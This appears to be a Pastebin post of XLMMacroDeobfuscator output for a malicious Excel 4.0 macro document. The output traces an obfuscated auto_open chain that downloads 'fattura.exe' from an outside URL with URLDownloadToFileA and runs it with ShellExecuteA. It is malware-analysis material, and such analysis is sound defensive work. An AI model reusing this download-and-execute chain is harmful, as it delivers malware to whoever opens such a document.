API tools faq
paste
Advertisement
dissectmalware

XLMMacroDeobfuscator output

dissectmalware
Apr 16th, 2020
419
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.54 KB | None | 0 0
raw download clone embed print report
  1. auto_open: wsgCriwHppcPpMZnUmY!$BW$1519
  2. SHEET: wsgCriwHppcPpMZnUmY Macrosheet xl/macrosheets/sheet1.xml
  3. Interpreted:BW1519 RUN(wsgCriwHppcPpMZnUmY!BK125)
  4. Interpreted:BK125 RUN(wsgCriwHppcPpMZnUmY!HW1072)
  5. Interpreted:HW1072 RUN(wsgCriwHppcPpMZnUmY!FZ1806)
  6. Interpreted:FZ1806 RUN(wsgCriwHppcPpMZnUmY!BZ1011)
  7. Interpreted:BZ1011 RUN(wsgCriwHppcPpMZnUmY!BD286)
  8. Interpreted:BD286 RUN(wsgCriwHppcPpMZnUmY!EW335)
  9. Interpreted:EW335 RUN(wsgCriwHppcPpMZnUmY!DH1352)
  10. Interpreted:DH1352 RUN(wsgCriwHppcPpMZnUmY!BM994)
  11. Interpreted:BM994 RUN(wsgCriwHppcPpMZnUmY!B352)
  12. Interpreted:B352 RUN(wsgCriwHppcPpMZnUmY!GG456)
  13. Interpreted:GG456 RUN(wsgCriwHppcPpMZnUmY!GZ1897)
  14. Interpreted:GZ1897 RUN(wsgCriwHppcPpMZnUmY!CT592)
  15. Interpreted:CT592 RUN(wsgCriwHppcPpMZnUmY!GA1053)
  16. Interpreted:GA1053 RUN(wsgCriwHppcPpMZnUmY!FC424)
  17. Interpreted:FC424 RUN(wsgCriwHppcPpMZnUmY!X548)
  18. Interpreted:X548 RUN(wsgCriwHppcPpMZnUmY!AY967)
  19. Interpreted:AY967 RUN(wsgCriwHppcPpMZnUmY!HK448)
  20. Interpreted:HK448 RUN(wsgCriwHppcPpMZnUmY!EV1896)
  21. Interpreted:EV1896 RUN(wsgCriwHppcPpMZnUmY!BT1077)
  22. Interpreted:BT1077 RUN(wsgCriwHppcPpMZnUmY!FY63)
  23. Interpreted:FY63 RUN(wsgCriwHppcPpMZnUmY!DC1871)
  24. Interpreted:DC1871 RUN(wsgCriwHppcPpMZnUmY!IH685)
  25. Interpreted:IH685 RUN(wsgCriwHppcPpMZnUmY!CI1857)
  26. Interpreted:CI1857 RUN(wsgCriwHppcPpMZnUmY!CS371)
  27. Interpreted:CS371 RUN(wsgCriwHppcPpMZnUmY!FZ304)
  28. Interpreted:FZ304 RUN(wsgCriwHppcPpMZnUmY!AC122)
  29. Interpreted:AC122 RUN(wsgCriwHppcPpMZnUmY!DL1470)
  30. Interpreted:DL1470 RUN(wsgCriwHppcPpMZnUmY!BB1966)
  31. Interpreted:BB1966 RUN(wsgCriwHppcPpMZnUmY!EB868)
  32. Interpreted:EB868 RUN(wsgCriwHppcPpMZnUmY!AB1454)
  33. Interpreted:AB1454 RUN(wsgCriwHppcPpMZnUmY!EM1941)
  34. Interpreted:EM1941 RUN(wsgCriwHppcPpMZnUmY!FF356)
  35. Interpreted:FF356 RUN(wsgCriwHppcPpMZnUmY!CF646)
  36. Interpreted:CF646 RUN(wsgCriwHppcPpMZnUmY!GD1502)
  37. Interpreted:GD1502 RUN(wsgCriwHppcPpMZnUmY!GP1458)
  38. Interpreted:GP1458 RUN(wsgCriwHppcPpMZnUmY!HU1973)
  39. Interpreted:HU1973 RUN(wsgCriwHppcPpMZnUmY!IC1003)
  40. Interpreted:IC1003 RUN(wsgCriwHppcPpMZnUmY!CZ511)
  41. Interpreted:CZ511 RUN(wsgCriwHppcPpMZnUmY!AF617)
  42. Interpreted:AF617 RUN(wsgCriwHppcPpMZnUmY!CH1539)
  43. Interpreted:CH1539 RUN(wsgCriwHppcPpMZnUmY!EV125)
  44. Interpreted:EV125 RUN(wsgCriwHppcPpMZnUmY!CK344)
  45. Interpreted:CK344 RUN(wsgCriwHppcPpMZnUmY!CH278)
  46. Interpreted:CH278 RUN(wsgCriwHppcPpMZnUmY!FH610)
  47. Interpreted:FH610 RUN(wsgCriwHppcPpMZnUmY!AQ1359)
  48. Interpreted:AQ1359 RUN(wsgCriwHppcPpMZnUmY!DO482)
  49. Interpreted:DO482 RUN(wsgCriwHppcPpMZnUmY!CN1615)
  50. Interpreted:CN1615 RUN(wsgCriwHppcPpMZnUmY!DV1643)
  51. Interpreted:DV1643 RUN(wsgCriwHppcPpMZnUmY!L1765)
  52. Interpreted:L1765 RUN(wsgCriwHppcPpMZnUmY!EU1595)
  53. Interpreted:EU1595 RUN(wsgCriwHppcPpMZnUmY!IH943)
  54. Interpreted:IH943 RUN(wsgCriwHppcPpMZnUmY!CA1984)
  55. Interpreted:CA1984 RUN(wsgCriwHppcPpMZnUmY!CA1071)
  56. Interpreted:CA1071 RUN(wsgCriwHppcPpMZnUmY!FG1495)
  57. Interpreted:FG1495 RUN(wsgCriwHppcPpMZnUmY!BC1984)
  58. Interpreted:BC1985 RUN(wsgCriwHppcPpMZnUmY!IL162)
  59. Interpreted:IL162 e
  60. Interpreted:IL163 RUN(wsgCriwHppcPpMZnUmY!CQ453)
  61. Interpreted:CQ453 FORMULA('http://service.pandtelectric.com/fattura.exe',wsgCriwHppcPpMZnUmY!BB54)
  62. Interpreted:CQ454 RUN(wsgCriwHppcPpMZnUmY!HQ1608)
  63. Interpreted:HQ1608 e
  64. Interpreted:HQ1609 RUN(wsgCriwHppcPpMZnUmY!HA792)
  65. Interpreted:HA792 FORMULA('C:\ProgramData\jeTneVi.exe',wsgCriwHppcPpMZnUmY!GC1642)
  66. Interpreted:HA793 RUN(wsgCriwHppcPpMZnUmY!S1017)
  67. Interpreted:S1017 e
  68. Interpreted:S1018 RUN(wsgCriwHppcPpMZnUmY!IF1497)
  69. Interpreted:IF1497 FORMULA('C:\ProgramData\jeTneVi.exe',wsgCriwHppcPpMZnUmY!CB1256)
  70. Interpreted:IF1498 RUN(wsgCriwHppcPpMZnUmY!AE1439)
  71. Interpreted:AE1439 N
  72. Interpreted:AE1440 RUN(wsgCriwHppcPpMZnUmY!EN221)
  73. Interpreted:EN221 FORMULA('URLMON',wsgCriwHppcPpMZnUmY!EB661)
  74. Interpreted:EN222 RUN(wsgCriwHppcPpMZnUmY!BG980)
  75. Interpreted:BG980 A
  76. Interpreted:BG981 RUN(wsgCriwHppcPpMZnUmY!HR732)
  77. Interpreted:HR732 FORMULA('URLDownloadToFileA',wsgCriwHppcPpMZnUmY!AE429)
  78. Interpreted:HR733 RUN(wsgCriwHppcPpMZnUmY!CR442)
  79. Interpreted:CR442 J
  80. Interpreted:CR443 RUN(wsgCriwHppcPpMZnUmY!ID209)
  81. Interpreted:ID209 FORMULA('JJCCJJ',wsgCriwHppcPpMZnUmY!FK1459)
  82. Interpreted:ID210 RUN(wsgCriwHppcPpMZnUmY!CE1146)
  83. Interpreted:CE1146 2
  84. Interpreted:CE1147 RUN(wsgCriwHppcPpMZnUmY!FD1701)
  85. Interpreted:FD1701 FORMULA('Shell32',wsgCriwHppcPpMZnUmY!BO1913)
  86. Interpreted:FD1702 RUN(wsgCriwHppcPpMZnUmY!GF939)
  87. Interpreted:GF939 A
  88. Interpreted:GF940 RUN(wsgCriwHppcPpMZnUmY!AI1225)
  89. Interpreted:AI1225 FORMULA('ShellExecuteA',wsgCriwHppcPpMZnUmY!GM1203)
  90. Interpreted:AI1226 RUN(wsgCriwHppcPpMZnUmY!W909)
  91. Interpreted:W909 J
  92. Interpreted:W910 RUN(wsgCriwHppcPpMZnUmY!FK1675)
  93. Interpreted:FK1675 FORMULA('JJCCCCJ',wsgCriwHppcPpMZnUmY!CF742)
  94. Interpreted:FK1676 RUN(wsgCriwHppcPpMZnUmY!FW421)
  95. Interpreted:FW421 n
  96. Interpreted:FW422 RUN(wsgCriwHppcPpMZnUmY!O488)
  97. Interpreted:O488 FORMULA('Open',wsgCriwHppcPpMZnUmY!IO1228)
  98. Interpreted:O489 RUN(wsgCriwHppcPpMZnUmY!DE1244)
  99. Interpreted:DE1244 e
  100. Interpreted:DE1245 RUN(wsgCriwHppcPpMZnUmY!IC1806)
  101. Interpreted:IC1806 FORMULA('regsvr32.exe',wsgCriwHppcPpMZnUmY!HD188)
  102. Interpreted:IC1807 RUN(wsgCriwHppcPpMZnUmY!HV1945)
  103. Interpreted:HV1945 e
  104. Interpreted:HV1946 RUN(wsgCriwHppcPpMZnUmY!EA1569)
  105. Interpreted:EA1569 FORMULA('rundll32.exe',wsgCriwHppcPpMZnUmY!DX1275)
  106. Interpreted:EA1570 RUN(wsgCriwHppcPpMZnUmY!BC1986)
  107. Interpreted:BC1986 CALL(URLMON,URLDownloadToFileA,JJCCJJ,0,http://service.pandtelectric.com/fattura.exe,C:\ProgramData\jeTneVi.exe,0,0)
  108. Interpreted:BC1987 CALL(Shell32,ShellExecuteA,JJCCCCJ,0,Open,C:\ProgramData\jeTneVi.exe,0,0)
  109. Interpreted:BC1990 HALT()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!